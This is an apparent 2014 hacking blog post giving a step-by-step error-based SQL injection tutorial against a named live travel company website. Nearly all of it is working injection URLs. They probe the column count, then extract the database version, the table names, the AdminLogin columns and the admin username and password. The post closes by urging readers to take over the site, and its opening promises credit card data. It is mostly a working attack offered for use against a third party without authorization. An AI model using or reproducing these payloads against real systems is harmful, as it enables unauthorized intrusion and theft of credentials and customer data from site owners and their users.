BREAKING NEWS

Category 5

Category 6

Category 7

Wednesday, 19 November 2014

Error Based SQL injection | Hacking Point

DNS Poisoning and DNS Hijacking | Hacking Point

Hello Friends How are you. Today I am going to show you How we use Error Based SQL Injection and how we inject a website , access its database and get the stored information in it; such as passwords and credit card informations etc ;) .
Lets Get Started...!
I'm taking the below website as a sample to be injected.
http://www.latintourdimensions.com/overview/product_detail.php?id=352
From this point we can inject this website.
Now just simply add a colon ( ' ) in the end of the website
http://www.latintourdimensions.com/overview/product_detail.php?id=352'
See there we have SQL error,
If you see any error regarding SQL then the site is vulnerable and you can start injecting it ;)

   


Now we enter our commands to fool the SQL database and it gives us the whole stored information
Now lets find the number of columns in database
We use "ORDER BY" to find the number of columns

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 1--+           (You can see No ERROR Occured)


http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 2--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 3--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 4--+           (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 5--+          (You can see No ERROR Occured)

http://www.latintourdimensions.com/overview/product_detail.php?id=352 order by 6--+          (Here an ERROR is Occured)

We got an error at "ORDER BY 6--+"
It means there is no 6th column available in the database. Hence, its Clear that we have 5 Columns (Got it...?).
Now Lets find the column which is vulnerable and through which we can input our Queries to get the passwords etc.
To find Vulnerable Column we use "UNION SELECT 1,2,3....allColumns...,4,5 --+" 

http://www.latintourdimensions.com/overview/product_detail.php?id=352 +UNION+ALL+SELECT+1,2,3,4,5 --+

When we do Union select there is an error  :: The used SELECT statements have a different number of columns ::




Now you have to do error base injection. 

First find the version.

http://www.latintourdimensions.com/overview/product_detail.php?id=352+OR+1+GROUP+BY+CONCAT_WS(0x3a,VERSION(),FLOOR(RAND(0)*2))+HAVING+MIN(0)+OR+1--+

  
Here we find the version . :: 5.1.54-log:1::

Now find the Database.

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(DATABASE()+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+
     
    

Here You get the database name, Now find the Tables By the following Query

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

    

See Here the first table. " Activities " 

Increase the Limit to get More tables e.g

 LIMIT 0,1  Dot it to 1,1           2,1           3,1           4,1     and so on to extract more..

see.. 

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

   


See the second table is "AdminLogin" ..

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(table_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.TABLES+WHERE+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+


See the third table is "Agencia"

and so on .... 


Now find the admin details from the table AdminLogin 

http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+


  
There is the first column in table Admin Login.

**NOTE**
If the col in which admin details are stored is named different e.g  like this site the table which contains admin details is AdminLogin , other webs have may different so what u have to change in the querry is that  

See in my querry i changed column name AdminLogin into hex
if any other web has different column name you have to change this
e.g the column name is admin so u have to change it into hex and then replace that hex with the admin hex encoded value. 


  Now extract more by increasing limit...


http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+1,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

   


The next column


http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(column_name+AS+CHAR),0x7e))+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=0x41646d696e4c6f67696e+AND+table_schema=DATABASE()+LIMIT+2,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

  

and thats one also been gotten

Now get data from These columns


  http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(usuario)+AS+CHAR),0x7e))+FROM+AdminLogin+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

To get data from Column "usuario" 

   

Means username is admin

Now find data from column " passw "

  http://www.latintourdimensions.com/overview/product_detail.php?id=352+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(passw)+AS+CHAR),0x7e))+FROM+AdminLogin+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)--+

  

This means that password is also admin.

So now just find the admin panel and get control to the whole website and enjoy

Thanks all.
Please Share if you Like it :) 

Post a Comment

 
Copyright © 2013 Hacking Point | Learn Ethical Hacking and Cyber Security
Powered byBlogger